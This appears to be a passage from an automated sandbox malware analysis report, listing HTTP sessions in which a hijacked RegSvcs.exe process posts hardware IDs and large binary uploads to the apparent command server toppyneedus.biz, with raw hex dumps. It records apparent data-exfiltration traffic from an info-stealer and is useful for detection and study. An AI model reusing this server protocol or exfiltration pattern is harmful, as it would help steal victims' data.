                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FZFFtQSmx5PvsEVvaI1ubEGBCxsXhMGkG3nFwoBoiCgGBBtbPwia3fPoCMMDqrBVweZh1bBaEBRFybtWHcuWngDQ76vv%2Bj7ZklP0cvUOuCls1YbZyxPAoWwsvwmjcNTgh0%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999c058810cac-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1706&rtt_var=645&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13768&delivery_rate=1688837&cwnd=234&unsent_bytes=0&cid=49224691215c9383&ts=744&x=0"
                                                                            2025-01-27 14:58:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-27 14:58:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.749771104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:24 UTC273OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=O3L3XFLJLH
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15027
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:24 UTC15027OUTData Raw: 2d 2d 4f 33 4c 33 58 46 4c 4a 4c 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 4f 33 4c 33 58 46 4c 4a 4c 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 33 4c 33 58 46 4c 4a 4c 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 0d 0a 2d 2d 4f 33 4c 33 58 46 4c 4a 4c 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                            Data Ascii: --O3L3XFLJLHContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--O3L3XFLJLHContent-Disposition: form-data; name="pid"2--O3L3XFLJLHContent-Disposition: form-data; name="lid"NNaWCM--WORK--O3L3XFLJLHContent-D
                                                                            2025-01-27 14:58:25 UTC1126INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:25 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=1i3ehf7k2jbqmm29g1uil0spa2; expires=Fri, 23 May 2025 08:45:04 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzF9BSQC4cjZdnSnGeEkMddO9ldAOclcHWGzC84d5jxyMftAJ%2FZtEou4HMI7W004h35krq1FOsdm8W7gp78WXyKA%2Fs9d5%2Fzt1Acp7MFJNv1KXWh5Vkuqrfy4bzUrF0xDdsY%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999c81e3fc475-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1459&rtt_var=570&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15958&delivery_rate=1883870&cwnd=181&unsent_bytes=0&cid=95b18db3ed5dfae8&ts=888&x=0"
                                                                            2025-01-27 14:58:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-27 14:58:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.749782104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:26 UTC277OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=FEGAA9ZO8PKK2G
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20376
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:26 UTC15331OUTData Raw: 2d 2d 46 45 47 41 41 39 5a 4f 38 50 4b 4b 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 46 45 47 41 41 39 5a 4f 38 50 4b 4b 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 45 47 41 41 39 5a 4f 38 50 4b 4b 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 0d 0a 2d 2d 46 45 47 41 41 39 5a 4f 38
                                                                            Data Ascii: --FEGAA9ZO8PKK2GContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--FEGAA9ZO8PKK2GContent-Disposition: form-data; name="pid"3--FEGAA9ZO8PKK2GContent-Disposition: form-data; name="lid"NNaWCM--WORK--FEGAA9ZO8
                                                                            2025-01-27 14:58:26 UTC5045OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                            2025-01-27 14:58:26 UTC1127INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:26 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=o2upuqh1og3jm8k007ma212lrq; expires=Fri, 23 May 2025 08:45:05 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XIOgdBFPT8n6ma2JjBsJ8QufUv7Lngx62LgJ5D18Ip4eug6gYaXXD57lvt20Vml0UW%2FuQYYR9KqLGLJDuDGUscot%2Fgd%2BVYOhIFKs3FUuQ6JHU6rMdwtOv8V1tNKSXY3Whqo%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999d11867423e-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1541&rtt_var=608&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21333&delivery_rate=1757977&cwnd=202&unsent_bytes=0&cid=67729e0a7f1527d5&ts=959&x=0"
                                                                            2025-01-27 14:58:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-27 14:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.749791104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:27 UTC277OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=GGL558OSKC7I9LM
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 2610
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:27 UTC2610OUTData Raw: 2d 2d 47 47 4c 35 35 38 4f 53 4b 43 37 49 39 4c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 47 47 4c 35 35 38 4f 53 4b 43 37 49 39 4c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 47 4c 35 35 38 4f 53 4b 43 37 49 39 4c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 0d 0a 2d 2d 47 47 4c 35 35 38
                                                                            Data Ascii: --GGL558OSKC7I9LMContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--GGL558OSKC7I9LMContent-Disposition: form-data; name="pid"1--GGL558OSKC7I9LMContent-Disposition: form-data; name="lid"NNaWCM--WORK--GGL558
                                                                            2025-01-27 14:58:28 UTC1124INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:28 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=1c8r8j11mjvaesbk78jqe4fgu6; expires=Fri, 23 May 2025 08:45:07 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OeH5UgaC7s3fKuUZiS6J%2B9k1JEhLsFe6rFMOeAhxKeuS1axjf4q9NvSi7JPcH054rvWFKBtsKn4BmBLF4ZGXqrTcsa2FsAf6Iyyuo0EOKD9iTmeGn%2B8PK%2BPLkNNfARcOxQU%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999da8be94414-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1727&rtt_var=662&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2838&recv_bytes=3523&delivery_rate=1634938&cwnd=180&unsent_bytes=0&cid=3444e6774e37f9c6&ts=874&x=0"
                                                                            2025-01-27 14:58:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-27 14:58:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.749802104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:29 UTC272OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=RVMKHS8I
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 150286
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 0d 0a 2d 2d 52 56 4d 4b 48 53 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                            Data Ascii: --RVMKHS8IContent-Disposition: form-data; name="hwid"2CDE6C0265185D724654FD9A0884370E--RVMKHS8IContent-Disposition: form-data; name="pid"1--RVMKHS8IContent-Disposition: form-data; name="lid"NNaWCM--WORK--RVMKHS8IContent-Dispositi
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: c1 c4 e8 30 63 59 8a 42 97 e2 03 a5 af ea 4c 86 26 98 fb 23 83 4e 36 0a 52 0d a2 2b ca 58 a5 e1 e8 e1 c8 2b 8a 8e 01 7b 42 7b 21 bf e3 1c 6f f4 55 8b b9 60 f8 23 b6 93 47 48 7c 8c 8b 1a ae 67 26 38 be 8a c7 dc 77 fd cd 96 21 46 2d d8 4f 76 96 bb ec f9 2e 31 38 56 29 7c 35 ff d8 53 dd d9 09 73 2c 41 ad 8f 6b e6 29 3e 51 d8 49 f7 8a f7 01 14 a0 09 ec a1 a0 a7 66 42 ea 68 3f df 76 37 07 30 4c 72 0d 27 f7 a6 14 45 b6 5c c1 34 13 0a 7b 07 a6 f3 f3 5a 0b 7c 4a a6 05 30 57 ed 57 8d 74 03 da 90 2f 7b bb e6 df ab ea 19 3e 9f d1 7e fe 34 6b 18 8a 74 3e f5 59 cd 06 06 0b ac e8 ff a6 cd 04 a6 f7 04 8e 6e 14 51 65 26 1e ca e6 43 b7 79 fe f6 a0 b8 0e 51 19 d2 f9 cd d1 56 23 a3 b2 fa fe 55 2e c7 6e 35 b4 c5 bd 86 c8 c1 50 2f 50 e6 56 0f 05 ba 2d 9f 5b 10 de f2 65 7b f5
                                                                            Data Ascii: 0cYBL&#N6R+X+{B{!oU`#GH|g&8w!F-Ov.18V)|5Ss,Ak)>QIfBh?v70Lr'E\4{Z|J0WWt/{>~4kt>YnQe&CyQV#U.n5P/PV-[e{
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: d1 8d 7f 7f f3 22 c9 dd 21 c0 4a 6d 77 e6 c5 72 1c 8f 78 c9 8a 63 56 76 27 6e fd 9e e9 db 9a 76 47 e9 c3 e8 f6 ef ee 8c 41 a9 be 6c 41 b7 3a 9f bf 89 14 aa 9b 3d 7a f0 e9 fa 72 c7 8e 8f 87 2e 38 f5 7f 17 35 58 51 eb 77 af 9e df 9b fe 96 3f a2 97 40 3a 1f 67 71 ed 86 60 c5 bb 3e 75 f3 3b 2f fc 93 0e 5d 27 ba 96 87 e1 c5 a5 fd dc d9 e5 3a b9 69 24 a3 7e 82 a3 8c 8a 5e 60 cd b1 ea ce 57 15 9e d7 f7 ac 59 2d 26 df 7e b0 09 7c ff b8 3e 91 84 2b 6b b0 87 fb 2c 9e a0 3f 78 26 33 ad fd 16 e8 21 4b 36 e7 a7 dd 9b 5b d7 bb f3 4b d8 de b7 99 76 67 32 60 b8 7c 4a 65 7f ef ce 3d 8b 46 ff f7 85 08 69 50 35 f0 ff 7f 64 c4 6f 99 7d 9f 3b 37 2d 1a 55 2e f1 4c 4f 0e da 34 26 d6 b1 c7 be ce b6 9b b3 bf 00 13 5b bf 77 f4 fa b2 a4 ee 58 a0 3d 17 ed ab 50 a1 c4 85 49 8f d0 17
                                                                            Data Ascii: "!JmwrxcVv'nvGAlA:=zr.85XQw?@:gq`>u;/]':i$~^`WY-&~|>+k,?x&3!K6[Kvg2`|Je=FiP5do};7-U.LO4&[wX=PI
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: a7 47 27 b9 58 a6 d4 cf 69 40 2c cb ab 70 c9 07 6f 4b 5c 64 ea ce 29 f8 fb 73 8d d7 05 a0 66 d3 34 63 33 0e 32 48 62 e4 a7 3e 70 5d 1b d4 7b 9c ee 96 17 a3 01 a9 58 48 e7 b7 da bc b9 81 e1 ec 2b ff 9a e3 15 07 a1 92 7e 86 09 03 25 f8 c9 2b 00 fb 27 4e a4 6e 5b 0a 62 b7 a5 86 eb cf 94 80 a3 1f 2e 57 72 03 82 6d e3 d6 c6 21 4c ec 42 0f 1e 76 69 cd 86 b5 50 90 22 5f 8c 6f 61 8c 69 3b 89 e5 4c 31 18 69 6a f8 27 73 e4 27 81 c3 d8 3f 33 a5 47 07 df 25 5f c7 81 7b 80 d8 6c 87 61 e2 e0 14 80 49 02 03 36 8c 9b ee 3f 96 e2 a8 b2 65 4d 71 e7 76 cb 33 ca 22 e6 39 7e c8 86 92 ba e0 a4 80 72 e3 25 35 d9 ed 4b e7 64 15 81 d1 dd 2e b2 62 68 f2 d8 09 95 e3 fd d2 5a 09 88 dd a1 cd 79 c3 5b d5 67 29 0a bc 8e 82 6b ab 03 ec ab 40 19 7e 03 d5 39 70 34 c3 04 3d f7 cf eb 85 3e
                                                                            Data Ascii: G'Xi@,poK\d)sf4c32Hb>p]{XH+~%+'Nn[b.Wrm!LBviP"_oai;L1ij's'?3G%_{laI6?eMqv3"9~r%5Kd.bhZy[g)k@~9p4=>
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: f6 61 f8 bc 3f 0c 38 ca 4d 41 a4 87 28 6b c5 3d 4c d8 31 59 2a 2f 4e c7 64 12 99 ea ac bb 70 ef c7 f6 c6 2e 19 fa 38 7d 63 c1 d2 cc 2e c7 39 d4 74 25 ba 7d 1c de b1 97 fc 55 1d c0 05 d8 27 99 4f a1 5a 9f 82 b2 91 56 53 70 1a f8 47 df 41 95 50 d1 85 c3 13 7c 71 a7 9f 40 cf 1d 23 7b 84 17 21 71 a9 d9 54 0a d3 28 03 35 1d 50 32 f6 af 60 01 38 41 f8 f1 6d ec 79 05 28 ca 52 64 b9 f6 c7 50 b9 95 38 8d b8 04 f4 3d 74 f0 da a1 1d e7 2a ce fe fa 28 6c 33 ea 8b 5b cf 78 77 b7 c1 7b 07 d5 26 d1 d8 dd 5a 7e ea ab b9 9d 80 f9 dc e7 7b 7e e5 ee ea 6e c0 68 a5 47 de ee 0a 8f 46 fd 87 e8 22 17 7b 2d 3a 20 ce ea 30 9b 0b 1c 8a 30 24 3f 40 e4 cc 8d 2e 09 3a 40 4f 35 e8 3a 64 dd f5 58 5f 93 ce 5b 23 90 2b 93 a0 fb cb a2 24 94 eb 3d 5e 62 15 b6 46 e4 af 41 d6 e7 17 bd 24 5c
                                                                            Data Ascii: a?8MA(k=L1Y*/Ndp.8}c.9t%}U'OZVSpGAP|q@#{!qT(5P2`8Amy(RdP8=t*(l3[xw{&Z~{~nhGF"{-: 00$?@.:@O5:dX_[#+$=^bFA$\
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: 8c 95 b2 4b 53 5b 11 97 e7 de fd 98 1a ee cd b0 38 13 ed ec b6 e9 f2 40 62 b6 e9 6e a0 b7 ed d7 5c 0e 59 65 8f 51 fc df ce 57 0a ca 7a 56 54 2d e4 43 1a 88 28 ae fa c7 5e f8 40 b5 dd a3 b6 65 cd 0a 91 09 be 74 0e 25 b2 c3 18 08 d3 b5 9f 3c 21 2d f9 b0 c2 fe 8a c9 67 fe 7d d3 85 d1 07 cb 6e 0d c1 6e f6 47 87 ca e3 d6 1e 9b 68 75 ad 28 eb c9 39 ca 9c ac c1 94 f1 24 87 ee 8e 71 4f 2d 69 59 a3 2c fa 27 91 06 df dc d2 19 a2 57 3a a7 f8 9e dc 63 2b be 1f 62 d2 3a 70 b7 fa e9 c2 4c f4 96 db e6 d6 90 c4 6c c6 95 83 7d 73 ba de a3 a6 f3 07 03 83 e2 15 d3 6b 3e 7b ff 3e 7a f3 6b e9 85 47 8a 5f 35 8e 3c d9 a2 e3 17 d9 41 9d 45 50 ea bc de fb 0c a1 ea 0a a2 f5 ca e9 24 61 4b a3 d7 6b 3f bd 95 a3 e7 fd 73 cb 8e 52 ad 0d aa 4c f0 97 0d d2 65 e7 f3 ba d0 ce 7a cb 16 67
                                                                            Data Ascii: KS[8@bn\YeQWzVT-C(^@et%<!-g}nnGhu(9$qO-iY,'W:c+b:pLl}sk>{>zkG_5<AEP$aKk?sRLezg
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: 73 16 cc 93 9e 7f ee 20 88 bb f7 e0 c4 00 43 98 a4 f7 24 33 14 c8 14 e0 0a 37 db fe bb bd 69 d7 ff ae 67 92 b4 ee 39 77 08 a6 60 a6 69 72 b8 34 c9 f0 ff 28 4b c4 d1 dd ab 45 83 05 9b 10 b7 6e 7c 7b 85 59 27 7f 4b d8 9d 6d 9e e7 ff 94 59 3d 84 4f 5c d4 85 40 e9 6d 09 70 e0 49 b1 a4 f5 59 c3 ea 7a de 7f 09 9e d0 11 85 74 7d 86 7d d2 b2 ab ec ed ff 34 a9 17 10 2b d2 51 b3 c2 8c bb 47 f8 45 3d 85 fb 7a 4d e7 b5 f3 3f bd 4b 90 26 b8 02 cf 71 04 fc 25 82 b6 ff 29 b2 4d 76 aa fa 5f 7f 5b ec 5f 65 03 72 eb 6c 4f ef 5d 87 9d 7a 67 bb 2f 28 ca 8a ff b3 4a 92 af 79 30 56 e4 01 25 30 fa b9 e1 bb a3 f2 a9 9a 7d b0 f4 3f b5 96 73 3f b0 66 5a ef c7 f7 e2 9b af 9d 94 cc 78 9f f4 48 f6 f9 4b 49 fc 4f 15 1b 94 12 6f 7f 9a 01 29 61 bf 0c a0 4c ee 66 d5 ce bf aa c0 f8 c0 01
                                                                            Data Ascii: s C$37ig9w`ir4(KEn|{Y'KmY=O\@mpIYzt}}4+QGE=zM?K&q%)Mv_[_erlO]zg/(Jy0V%0}?s?fZxHKIOo)aLf
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: a1 a5 fd 10 11 3d ec a6 ea 32 a2 aa e6 bb 96 f6 1c 93 74 0f 77 e3 00 2c d3 35 92 42 f4 99 ff 7d 4a af c1 9a 21 8b e0 14 34 d3 91 75 48 4f 62 c2 d5 cc 2e 24 ff f3 78 fe e3 ec 57 79 fc 6a 87 01 e1 22 ae 24 ec d7 4f 96 50 1e b5 56 b7 85 eb 39 ea 90 91 25 30 7e 5b 76 34 93 8e 78 1e 7b a9 49 7a a3 69 07 8a 75 36 b6 db 17 7f fe 62 16 e4 35 ba 9c 73 ca e7 de 29 e8 55 4a 7e 0d 41 ab 05 56 af dc 9e ae b6 4d 18 bf 52 bc a7 57 ba 6f b9 4c 7b a6 72 63 c3 95 23 e5 65 e1 cb 5f f8 e7 db c5 14 2b 5c ef 44 13 76 b7 5f d4 94 b5 7b 20 23 53 14 dd 1c 21 9a 62 e7 12 c7 53 bf bd f2 d9 d9 ed 61 73 49 6b 64 6a 76 3a e8 0c 4d 4f 07 0d 12 30 ba af 4b 2e f9 2f 1a d9 21 3b fe 73 1f 21 b2 95 29 01 d7 0d 5d 9a 5d b7 fe 39 fb e7 84 4e 03 17 26 29 6b 45 85 0f 04 40 31 b5 61 5e fb c1 d1
                                                                            Data Ascii: =2tw,5B}J!4uHOb.$xWyj"$OPV9%0~[v4x{Iziu6b5s)UJ~AVMRWoL{rc#e_+\Dv_{ #S!bSasIkdjv:MO0K./!;s!)]]9N&)kE@1a^
                                                                            2025-01-27 14:58:29 UTC15331OUTData Raw: 18 b4 39 c0 33 21 f2 41 d4 3c 84 cc 7c 70 a6 78 ef 9e 46 3e 24 e2 64 c3 16 d5 65 49 13 fd 80 04 fc 79 61 76 16 f2 6b d1 48 3d e2 17 16 20 c4 10 22 a0 19 1c 7e 11 b7 91 5a 43 53 d8 09 27 8a d5 a9 04 2f 8f 8c c9 20 74 79 c0 c0 09 4c 96 10 64 6b f7 3b c4 34 fa 92 d1 75 0c 73 d5 84 93 f3 49 9e 9d 1a e3 c9 9e 63 7e 73 c9 9e 7b c9 41 1d 95 73 c4 f9 64 db 60 f4 b6 da 5c 4e 71 a7 b2 c3 1e d5 c9 73 0e 8f 76 6d 4a be a8 d6 fa 52 8d 20 eb d9 94 a0 d8 be f8 56 b1 29 61 fc e6 75 44 43 f2 a5 9d d1 45 ef 61 79 39 4a 5a 22 fa ce 96 de 91 fd 5a 89 50 20 18 1e 38 04 cf 91 c3 0d fd 8b 37 fa f2 df ff 1c 98 93 c3 41 d8 a8 e4 50 02 24 a3 f9 90 f1 d4 f7 72 b5 79 50 02 08 11 e1 b0 96 f8 e0 cb 33 d3 30 5e 0f 60 f0 10 16 e7 8c 13 06 21 90 b5 99 c8 52 fd fa 0f 2c 7f c8 28 77 5d 1b
                                                                            Data Ascii: 93!A<|pxF>$deIyavkH= "~ZCS'/ tyLdk;4usIc~s{Asd`\NqsvmJR V)auDCEay9JZ"ZP 87AP$ryP30^`!R,(w]
